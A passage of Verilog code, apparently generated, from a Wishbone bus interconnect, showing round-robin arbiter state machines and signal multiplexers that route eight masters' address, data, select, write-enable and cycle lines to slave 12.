                    if ( s12_msel_arb2_req[6] ) 
                    begin
                        s12_msel_arb2_next_state = s12_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s12_msel_arb2_req[7] ) 
                        begin
                            s12_msel_arb2_next_state = s12_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s12_msel_arb2_req[0] ) 
                            begin
                                s12_msel_arb2_next_state = s12_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s12_msel_arb2_req[1] ) 
                                begin
                                    s12_msel_arb2_next_state = s12_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb2_req[2] ) 
                                    begin
                                        s12_msel_arb2_next_state = s12_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb2_req[3] ) 
                                        begin
                                            s12_msel_arb2_next_state = s12_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb2_grant5:
        begin
            if (  !( s12_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s12_msel_arb2_req[6] ) 
                begin
                    s12_msel_arb2_next_state = s12_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s12_msel_arb2_req[7] ) 
                    begin
                        s12_msel_arb2_next_state = s12_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s12_msel_arb2_req[0] ) 
                        begin
                            s12_msel_arb2_next_state = s12_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s12_msel_arb2_req[1] ) 
                            begin
                                s12_msel_arb2_next_state = s12_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s12_msel_arb2_req[2] ) 
                                begin
                                    s12_msel_arb2_next_state = s12_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb2_req[3] ) 
                                    begin
                                        s12_msel_arb2_next_state = s12_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb2_req[4] ) 
                                        begin
                                            s12_msel_arb2_next_state = s12_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb2_grant6:
        begin
            if (  !( s12_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s12_msel_arb2_req[7] ) 
                begin
                    s12_msel_arb2_next_state = s12_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s12_msel_arb2_req[0] ) 
                    begin
                        s12_msel_arb2_next_state = s12_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s12_msel_arb2_req[1] ) 
                        begin
                            s12_msel_arb2_next_state = s12_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s12_msel_arb2_req[2] ) 
                            begin
                                s12_msel_arb2_next_state = s12_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s12_msel_arb2_req[3] ) 
                                begin
                                    s12_msel_arb2_next_state = s12_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb2_req[4] ) 
                                    begin
                                        s12_msel_arb2_next_state = s12_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb2_req[5] ) 
                                        begin
                                            s12_msel_arb2_next_state = s12_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb2_grant7:
        begin
            if (  !( s12_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s12_msel_arb2_req[0] ) 
                begin
                    s12_msel_arb2_next_state = s12_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s12_msel_arb2_req[1] ) 
                    begin
                        s12_msel_arb2_next_state = s12_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s12_msel_arb2_req[2] ) 
                        begin
                            s12_msel_arb2_next_state = s12_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s12_msel_arb2_req[3] ) 
                            begin
                                s12_msel_arb2_next_state = s12_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s12_msel_arb2_req[4] ) 
                                begin
                                    s12_msel_arb2_next_state = s12_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb2_req[5] ) 
                                    begin
                                        s12_msel_arb2_next_state = s12_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb2_req[6] ) 
                                        begin
                                            s12_msel_arb2_next_state = s12_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s12_msel_arb3_req = { ( s12_msel_req[7] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'd3 ) ), ( s12_msel_req[6] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'd3 ) ), ( s12_msel_req[5] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'd3 ) ), ( s12_msel_req[4] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'd3 ) ), ( s12_msel_req[3] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'd3 ) ), ( s12_msel_req[2] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'd3 ) ), ( s12_msel_req[1] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'd3 ) ), ( s12_msel_req[0] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s12_msel_arb3_state <= s12_msel_arb3_grant0;
        end
        else
        begin 
            s12_msel_arb3_state <= s12_msel_arb3_next_state;
        end
    end
    always @ (  s12_msel_arb3_state or  { ( s12_msel_req[7] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'd3 ) ), ( s12_msel_req[6] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'd3 ) ), ( s12_msel_req[5] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'd3 ) ), ( s12_msel_req[4] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'd3 ) ), ( s12_msel_req[3] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'd3 ) ), ( s12_msel_req[2] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'd3 ) ), ( s12_msel_req[1] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'd3 ) ), ( s12_msel_req[0] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s12_msel_arb3_next_state = s12_msel_arb3_state;
        case ( s12_msel_arb3_state ) 
        s12_msel_arb3_grant0:
        begin
            if (  !( s12_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s12_msel_arb3_req[1] ) 
                begin
                    s12_msel_arb3_next_state = s12_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s12_msel_arb3_req[2] ) 
                    begin
                        s12_msel_arb3_next_state = s12_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s12_msel_arb3_req[3] ) 
                        begin
                            s12_msel_arb3_next_state = s12_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s12_msel_arb3_req[4] ) 
                            begin
                                s12_msel_arb3_next_state = s12_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s12_msel_arb3_req[5] ) 
                                begin
                                    s12_msel_arb3_next_state = s12_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb3_req[6] ) 
                                    begin
                                        s12_msel_arb3_next_state = s12_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb3_req[7] ) 
                                        begin
                                            s12_msel_arb3_next_state = s12_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb3_grant1:
        begin
            if (  !( s12_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s12_msel_arb3_req[2] ) 
                begin
                    s12_msel_arb3_next_state = s12_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s12_msel_arb3_req[3] ) 
                    begin
                        s12_msel_arb3_next_state = s12_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s12_msel_arb3_req[4] ) 
                        begin
                            s12_msel_arb3_next_state = s12_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s12_msel_arb3_req[5] ) 
                            begin
                                s12_msel_arb3_next_state = s12_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s12_msel_arb3_req[6] ) 
                                begin
                                    s12_msel_arb3_next_state = s12_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb3_req[7] ) 
                                    begin
                                        s12_msel_arb3_next_state = s12_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb3_req[0] ) 
                                        begin
                                            s12_msel_arb3_next_state = s12_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb3_grant2:
        begin
            if (  !( s12_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s12_msel_arb3_req[3] ) 
                begin
                    s12_msel_arb3_next_state = s12_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s12_msel_arb3_req[4] ) 
                    begin
                        s12_msel_arb3_next_state = s12_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s12_msel_arb3_req[5] ) 
                        begin
                            s12_msel_arb3_next_state = s12_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s12_msel_arb3_req[6] ) 
                            begin
                                s12_msel_arb3_next_state = s12_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s12_msel_arb3_req[7] ) 
                                begin
                                    s12_msel_arb3_next_state = s12_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb3_req[0] ) 
                                    begin
                                        s12_msel_arb3_next_state = s12_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb3_req[1] ) 
                                        begin
                                            s12_msel_arb3_next_state = s12_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb3_grant3:
        begin
            if (  !( s12_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s12_msel_arb3_req[4] ) 
                begin
                    s12_msel_arb3_next_state = s12_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s12_msel_arb3_req[5] ) 
                    begin
                        s12_msel_arb3_next_state = s12_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s12_msel_arb3_req[6] ) 
                        begin
                            s12_msel_arb3_next_state = s12_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s12_msel_arb3_req[7] ) 
                            begin
                                s12_msel_arb3_next_state = s12_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s12_msel_arb3_req[0] ) 
                                begin
                                    s12_msel_arb3_next_state = s12_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb3_req[1] ) 
                                    begin
                                        s12_msel_arb3_next_state = s12_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb3_req[2] ) 
                                        begin
                                            s12_msel_arb3_next_state = s12_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb3_grant4:
        begin
            if (  !( s12_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s12_msel_arb3_req[5] ) 
                begin
                    s12_msel_arb3_next_state = s12_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s12_msel_arb3_req[6] ) 
                    begin
                        s12_msel_arb3_next_state = s12_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s12_msel_arb3_req[7] ) 
                        begin
                            s12_msel_arb3_next_state = s12_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s12_msel_arb3_req[0] ) 
                            begin
                                s12_msel_arb3_next_state = s12_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s12_msel_arb3_req[1] ) 
                                begin
                                    s12_msel_arb3_next_state = s12_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb3_req[2] ) 
                                    begin
                                        s12_msel_arb3_next_state = s12_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb3_req[3] ) 
                                        begin
                                            s12_msel_arb3_next_state = s12_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb3_grant5:
        begin
            if (  !( s12_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s12_msel_arb3_req[6] ) 
                begin
                    s12_msel_arb3_next_state = s12_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s12_msel_arb3_req[7] ) 
                    begin
                        s12_msel_arb3_next_state = s12_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s12_msel_arb3_req[0] ) 
                        begin
                            s12_msel_arb3_next_state = s12_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s12_msel_arb3_req[1] ) 
                            begin
                                s12_msel_arb3_next_state = s12_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s12_msel_arb3_req[2] ) 
                                begin
                                    s12_msel_arb3_next_state = s12_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb3_req[3] ) 
                                    begin
                                        s12_msel_arb3_next_state = s12_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb3_req[4] ) 
                                        begin
                                            s12_msel_arb3_next_state = s12_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb3_grant6:
        begin
            if (  !( s12_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s12_msel_arb3_req[7] ) 
                begin
                    s12_msel_arb3_next_state = s12_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s12_msel_arb3_req[0] ) 
                    begin
                        s12_msel_arb3_next_state = s12_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s12_msel_arb3_req[1] ) 
                        begin
                            s12_msel_arb3_next_state = s12_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s12_msel_arb3_req[2] ) 
                            begin
                                s12_msel_arb3_next_state = s12_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s12_msel_arb3_req[3] ) 
                                begin
                                    s12_msel_arb3_next_state = s12_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb3_req[4] ) 
                                    begin
                                        s12_msel_arb3_next_state = s12_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb3_req[5] ) 
                                        begin
                                            s12_msel_arb3_next_state = s12_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb3_grant7:
        begin
            if (  !( s12_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s12_msel_arb3_req[0] ) 
                begin
                    s12_msel_arb3_next_state = s12_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s12_msel_arb3_req[1] ) 
                    begin
                        s12_msel_arb3_next_state = s12_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s12_msel_arb3_req[2] ) 
                        begin
                            s12_msel_arb3_next_state = s12_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s12_msel_arb3_req[3] ) 
                            begin
                                s12_msel_arb3_next_state = s12_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s12_msel_arb3_req[4] ) 
                                begin
                                    s12_msel_arb3_next_state = s12_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb3_req[5] ) 
                                    begin
                                        s12_msel_arb3_next_state = s12_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb3_req[6] ) 
                                        begin
                                            s12_msel_arb3_next_state = s12_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s12_msel_pri_out or  s12_msel_arb0_state or  s12_msel_arb1_state)
    begin
        if ( s12_msel_pri_out[0] ) 
        begin
            s12_msel_sel1 = s12_msel_arb1_state;
        end
        else
        begin 
            s12_msel_sel1 = s12_msel_arb0_state;
        end
    end
    always @ (  s12_msel_pri_out or  s12_msel_arb0_state or  s12_msel_arb1_state or  s12_msel_arb2_state or  s12_msel_arb3_state)
    begin
        case ( s12_msel_pri_out ) 
        2'd0:
        begin
            s12_msel_sel2 = s12_msel_arb0_state;
        end
        2'd1:
        begin
            s12_msel_sel2 = s12_msel_arb1_state;
        end
        2'd2:
        begin
            s12_msel_sel2 = s12_msel_arb2_state;
        end
        2'd3:
        begin
            s12_msel_sel2 = s12_msel_arb3_state;
        end
        endcase
    end
    assign s12_mast_sel = ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s12_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s12_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s12_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s12_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s12_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s12_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s12_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s12_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s12_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s12_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s12_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s12_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s12_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s12_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s12_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s12_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s12_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s12_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s12_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s12_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s12_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s12_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s12_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s12_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s12_m0_data_o = s12_data_i;
    assign s12_m1_data_o = s12_data_i;
    assign s12_m2_data_o = s12_data_i;
    assign s12_m3_data_o = s12_data_i;
    assign s12_m4_data_o = s12_data_i;
    assign s12_m5_data_o = s12_data_i;
    assign s12_m6_data_o = s12_data_i;
    assign s12_m7_data_o = s12_data_i;
    always @ (  ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s12_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s12_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s12_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s12_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s12_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s12_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s12_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s12_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s12_m0_cyc_r <= m0_s12_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s12_m1_cyc_r <= m1_s12_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s12_m2_cyc_r <= m2_s12_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s12_m3_cyc_r <= m3_s12_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s12_m4_cyc_r <= m4_s12_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s12_m5_cyc_r <= m5_s12_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s12_m6_cyc_r <= m6_s12_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s12_m7_cyc_r <= m7_s12_cyc_o;
    end
    always @ (  ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) or  m0_s12_cyc_o or  m1_s12_cyc_o or  m2_s12_cyc_o or  m3_s12_cyc_o or  m4_s12_cyc_o or  m5_s12_cyc_o or  m6_s12_cyc_o or  m7_s12_cyc_o or  s12_m0_cyc_r or  s12_m1_cyc_r or  s12_m2_cyc_r or  s12_m3_cyc_r or  s12_m4_cyc_r or  s12_m5_cyc_r or  s12_m6_cyc_r or  s12_m7_cyc_r)
    begin
        case ( ( ( ( s12_pri_sel == 2'd0 ) ) ? ( s12_arb_state ) : ( ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( s12_msel_arb0_state ) : ( ( ( ( s12_msel_pri_sel == 2'd1 ) ) ? ( s12_msel_sel1 ) : ( s12_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s12_wb_cyc_o = ( m0_s12_cyc_o & s12_m0_cyc_r );
        end
        3'd1:
        begin
            s12_wb_cyc_o = ( m1_s12_cyc_o & s12_m1_cyc_r );
        end
        3'd2:
        begin
            s12_wb_cyc_o = ( m2_s12_cyc_o & s12_m2_cyc_r );
        end
        3'd3:
        begin
            s12_wb_cyc_o = ( m3_s12_cyc_o & s12_m3_cyc_r );
        end
        3'd4:
        begin
            s12_wb_cyc_o = ( m4_s12_cyc_o & s12_m4_cyc_r );
        end
        3'd5:
        begin
            s12_wb_cyc_o = ( m5_s12_cyc_o & s12_m5_cyc_r );
        end
        3'd6:
        begin
            s12_wb_cyc_o = ( m6_s12_cyc_o & s12_m6_cyc_r );
        end
        3'd7:
        begin
            s12_wb_cyc_o = ( m7_s12_cyc_o & s12_m7_cyc_r );
        end
        endcase
    end
